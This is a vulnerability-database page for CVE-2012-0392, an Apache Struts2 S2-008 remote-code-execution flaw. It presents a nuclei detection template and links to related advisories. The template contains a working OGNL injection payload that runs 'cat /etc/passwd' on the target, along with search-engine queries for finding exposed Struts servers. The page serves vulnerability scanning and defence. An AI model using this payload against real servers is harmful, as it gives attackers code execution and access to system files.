Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Apache Struts2 S2-008 RCE

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 73 Views

The CookieInterceptor component in Apache Struts before 2.3.1.1 allows remote code execution via crafted HTTP Cookie header

Related
Refs
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins		Security Bulletin: Order Management could be subject to an Apache Struts vulnerability that could allow a remote attacker to execute arbitrary code on the system.
12 Apr 202417:44
ibm
IBM Security Bulletins		Security Bulletin: IBM Call Center and Apache Struts Struts upgrade strategy (various CVEs, see below)
14 Sep 202217:37
ibm
IBM Security Bulletins		Security Bulletin: IBM Sterling Order Management Apache Struts upgrade strategy (various CVEs, see below)
14 Sep 202217:45
ibm
BDU FSTEC		The vulnerability of the CookieInterceptor class implementation in the Apache Struts software platform allows a hacker to execute arbitrary code.
20 Oct 202200:00
bdu_fstec
Circl		CVE-2012-0392
6 Jan 201200:00
circl
Check Point Advisories		Apache Struts 2 CookieInterceptor OGNL Script Injection (CVE-2012-0392)
25 Jun 201200:00
checkpoint_advisories
CVE		CVE-2012-0392
8 Jan 201215:00
cve
Cvelist		CVE-2012-0392
8 Jan 201215:00
cvelist
F5 Networks		K13434228: Apache Struts vulnerability CVE-2012-0392
21 Feb 202319:57
f5
Github Security Blog		Apache Struts's CookieInterceptor component does not use the parameter-name whitelist
4 May 202200:29
github
Rows per page
id: CVE-2012-0392

info:
  name: Apache Struts2 S2-008 RCE
  author: pikpikcu
  severity: medium
  description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution on the affected server.
  remediation: Developers should immediately upgrade to at least Struts 2.3.18.
  reference:
    - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545
    - http://www.exploit-db.com/exploits/18329
    - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html
    - http://web.archive.org/web/20150110183326/http://secunia.com:80/advisories/47393
    - http://struts.apache.org/2.x/docs/s2-008.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2012-0392
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.90286
    epss-percentile: 0.99614
    cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: struts
    shodan-query:
      - http.html:"apache struts"
      - http.title:"struts2 showcase"
      - http.html:"struts problem report"
    fofa-query:
      - body="struts problem report"
      - title="struts2 showcase"
      - body="apache struts"
    google-query: intitle:"struts2 showcase"
  tags: cve,cve2012,apache,rce,struts,java,edb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210090222b73adacc09386883dd403e72d76b830d7597fd974c81b6f13a50397bb6902206b65bc3a54f07793474558c1b5b030906d27c2c267cb9428cda6a9b1e1a6fe2d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
7.9High risk
Vulners AI Score7.9
CVSS 26.8
EPSS0.90286
cvecve2012apachercestrutsjavaedb
73